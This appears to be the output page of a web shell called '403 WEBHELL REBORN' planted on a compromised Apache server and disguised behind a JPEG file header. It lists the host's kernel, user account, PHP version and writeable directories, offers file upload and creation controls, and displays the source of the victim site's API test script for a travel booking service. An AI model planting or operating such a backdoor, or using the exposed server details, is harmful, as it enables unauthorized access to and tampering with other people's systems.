ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/api/api_test.php
<?php
	header("Content-Type: application/json");
	$g4_path = "..";

	include "../common.php"; // Zipline Common
	include "common.php"; // API Common
	include "../adm/admin.lib.php"; // Admin Common

	echo ("===== TKPLACE - ZIPLINE : API START =====\n");



	// 행사인원정보 DB 기록
	insert_reserve_count('mg', '20220501', '09:30', 'API_TEST', "0");

	// 주문조회 쿼리
	$path = "/goods/event-stock-zipline";

	$call_data = array(
		"start_date" => "2022-06-27",
		"event_name"	=> "11:30",
		"event_inwon"	=> "10",
	);

	//$result = call($path, $call_data);
	$data = array();



	echo "\nEND";

	#######################################################################



	?>




Anon7 - 2021